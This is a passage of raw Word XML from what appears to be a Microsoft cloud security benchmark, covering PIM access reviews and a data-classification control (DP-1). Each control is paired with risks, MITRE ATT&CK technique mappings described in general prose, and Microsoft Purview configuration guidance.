        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18167336" w14:textId="0A7DC8EA" w:rsidR="003513EC" w:rsidRPr="00E53977" w:rsidRDefault="003513EC" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>abusing elevation control mechanisms (T1548.005) by exploiting misconfigured RBAC policies or excessive permissions to assign elevated roles, such as tenant-wide administrative access, from a resource group role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61120168" w14:textId="303CDF78" w:rsidR="00040C4D" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44907F23" w14:textId="72471C59" w:rsidR="003513EC" w:rsidRPr="00E53977" w:rsidRDefault="003513EC" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>manipulating accounts (T1098.001) by modifying IAM policies or disabling MFA to embed persistent access, allowing adversaries to retain unauthorized control over cloud resources like storage or compute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FFD21" w14:textId="186BFF65" w:rsidR="00040C4D" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6026CC8C" w14:textId="604EF788" w:rsidR="003513EC" w:rsidRPr="00E53977" w:rsidRDefault="003513EC" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>accessing data from cloud storage (T1530) using over-privileged accounts to enumerate and retrieve sensitive data from storage buckets or databases, exploiting unrevoked or poorly validated permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9FE449" w14:textId="2DFB7B77" w:rsidR="00040C4D" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40822A44" w14:textId="1E872DF9" w:rsidR="003513EC" w:rsidRPr="00E53977" w:rsidRDefault="003513EC" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:lastRenderedPageBreak/>
        <w:t>impairing defenses (T1562.001) by disabling cloud audit logging or monitoring with high-privilege accounts, concealing malicious actions like resource modifications or data access.</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0EF73D11" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00340B28" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00040C4D" w:rsidRPr="00E53977">
        <w:t>lan the access review scope and objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDBD18" w14:textId="3A9C97C8" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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30B6B81D" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Assign review responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FFA69" w14:textId="466376C0" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Designate resource owners, security teams, or role administrators to conduct reviews, ensuring reviewers have appropriate permissions in PIM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7D5A7" w14:textId="40CED24F" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Set up access reviews in Microsoft Entra PIM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D81E9" w14:textId="6479B3B7" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Conduct access reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65351374" w14:textId="5B13071C" w:rsidR="00932382" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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16776D09" w14:textId="680116A2" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Take actions based on review outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE1CD0" w14:textId="26E88890" w:rsidR="00393833" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Remove unnecessary access by revoking roles or access for users who no longer need them, utilizing Microsoft Entra ID reporting alongside PIM to identify accounts with no recent activity and removing their roles or deactivating them. You can also utilize PIM features for enhanced reconciliation, detecting excessive role assignments and automating ongoing reviews on predefined schedules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F221FC3" w14:textId="77777777" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="003513EC"/>
    <w:p w14:paraId="4AAE4475" w14:textId="50E613FA" w:rsidR="00105F1F" w:rsidRPr="00D16728" w:rsidRDefault="00105F1F" w:rsidP="00105F1F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc242449500"/>
      <w:r w:rsidRPr="00D16728">
        <w:lastRenderedPageBreak/>
        <w:t>Data Protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="42E95D0E" w14:textId="62A684D1" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00105F1F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc242449501"/>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Know and classify your data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="6BD74F81" w14:textId="5F049E29" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00105F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc242449502"/>
      <w:r w:rsidRPr="00105F1F">
        <w:t>DP-1: Discover, classify, and label sensitive data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="2B594BD2" w14:textId="0E31EFAA" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00080172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D10C2" w14:textId="4B2330C9" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Establish and maintain a comprehensive inventory of sensitive data by discovering, classifying, and labeling data across all repositories.</w:t>
      </w:r>
      <w:r w:rsidR="003513EC" w:rsidRPr="003513EC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003513EC" w:rsidRPr="003513EC">
        <w:t>This enables risk-based access controls, encryption policies, and monitoring to protect against unauthorized access and exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DFBF86" w14:textId="28E3BDC6" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00080172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00105F1F">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05F5D84F" w14:textId="695F5F1C" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Untracked regulated data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D0E2D" w14:textId="28A24D20" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>(PCI, PHI, PII) stored in unmanaged locations (shadow IT) bypasses required encryption, retention, or monitoring controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760CC426" w14:textId="73812F26" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Over-privileged access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3B6B7" w14:textId="7C43A26C" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Broad user/service access persists because sensitivity and business impact aren't identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C9DC7" w14:textId="4E6972BC" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Replica proliferation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA33FEE" w14:textId="66A17DF9" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Data replication to analytics, test, or export pipelines spreads sensitive content into lower-trust environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007652B7" w14:textId="6F24673B" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t>Forensic blind spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232008A2" w14:textId="5FA4CE8E" w:rsidR="00105F1F" w:rsidRDefault="00105F1F" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00105F1F">
        <w:t xml:space="preserve">Incident responders cannot rapidly scope blast radius due to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00105F1F">
        <w:t>absent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00105F1F">
        <w:t xml:space="preserve"> or incorrect sensitivity metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A42A6" w14:textId="6E38305B" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Automation failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072509BB" w14:textId="14D8FB3D" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Governance (DLP, conditional access, encryption workflows) fails to trigger without consistent labeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8715AC" w14:textId="77777777" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="006D5ECE"/>
    <w:p w14:paraId="09CB7855" w14:textId="43E26CB7" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FBF37" w14:textId="7F46765D" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Reconnaissance (TA0043)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186F77CE" w14:textId="12BA2657" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>gathering victim identity / data assets (T1596) by enumerating storage accounts, schema catalogs, and classification metadata to profile high-value repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE4D7C" w14:textId="7DBE53BF" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5B1EF" w14:textId="2BDF40EA" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>account &amp; permission enumeration (T1087, T1069) to reveal excessive role bindings enabling horizontal or vertical data access escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F537A78" w14:textId="57135704" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35601D" w14:textId="60373750" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:lastRenderedPageBreak/>
        <w:t>data from cloud storage (T1530) by extracting unlabeled blob containers or unmanaged exports lacking tracking tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD0A04" w14:textId="3DB856CD" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A15020" w14:textId="3829158B" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>exfiltration over web services (T1567) through ad-hoc export endpoints where labeling/policy gates are absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECC01A" w14:textId="4BCAF810" w:rsidR="006D5ECE" w:rsidRDefault="006D5ECE" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5ECE">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F729940" w14:textId="6EA54917" w:rsidR="003513EC" w:rsidRDefault="003513EC" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>automated exfiltration (T1020) using scripted pagination / looping to quietly harvest misclassified data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CAFFB" w14:textId="746851A4" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-1.1: Discover, classify, and label sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638313F9" w14:textId="507B26B5" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Use Microsoft Purview to build a comprehensive data map that automatically discovers, classifies, and labels sensitive information across your entire data estate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BABD76B" w14:textId="722F27D0" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Data discovery and classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156EB14D" w14:textId="060A6478" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Deploy Microsoft Purview to discover, classify, and label sensitive data across Azure, on-premises, Microsoft 365, and multi-cloud environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98AACA" w14:textId="663CCB13" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Use Microsoft Purview Data Map to automatically scan and catalog data sources including Azure Storage, Azure SQL Database, Azure Synapse Analytics, and other supported services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F496EB" w14:textId="5DEC61CD" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Enable sensitivity labels in Purview Data Map to automatically apply classification labels (e.g., Confidential, Highly Confidential, PII, PHI) based on data content patterns and organizational policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16297B12" w14:textId="276D7D90" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Document-level encryption and protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1AE805" w14:textId="2CB5B12B" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Deploy Microsoft Purview Information Protection to apply persistent encryption and usage rights to documents and emails based on sensitivity labels. Configure labels to automatically encrypt files, apply watermarks, restrict forwarding, set expiration dates, and revoke access even after data leaves your organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6AA7F" w14:textId="4F8A1B4C" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Enable Azure Rights Management Service (Azure RMS) as the underlying protection technology that encrypts documents and emails with usage policies (view-only, no-copy, no-print) that persist regardless of where data is stored or shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFEA5A5" w14:textId="331FA09E" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Database classification and integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD02992" w14:textId="1B188CF2" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>For Azure SQL databases, enable SQL Data Discovery &amp; Classification to identify, classify, and label columns containing sensitive data such as credit card numbers, social security numbers, or health records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6CC39" w14:textId="2CD5122F" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
